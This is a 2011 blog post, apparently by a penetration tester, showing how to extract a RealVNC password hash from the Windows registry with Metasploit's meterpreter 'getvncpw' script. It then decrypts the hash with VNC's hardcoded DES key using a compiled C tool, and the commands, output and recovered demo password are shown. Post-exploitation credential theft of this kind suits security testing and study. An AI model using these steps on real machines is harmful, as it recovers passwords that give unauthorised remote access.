Tuesday, March 15, 2011

VNC passwords and Metasploit and DES


inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>


you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:
http://packetstormsecurity.org/files/view/10159/vncdec.

change the relevant section

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};


getvncpw spit out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass


or use this one
http://www.consume.org/~jshare/vncdec.c

where you can just put your hash on the command line and don't have to recompile every time.
CG Web Developer

Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.

1 comment:

Rob Fuller (mubix) said...

I rewrote the script as a post module.

Info here:
http://www.room362.com/blog/2011/3/20/metasploit-vnc-password-extraction.html

Commited as of r12048
https://www.metasploit.com/redmine/projects/framework/repository/revisions/12048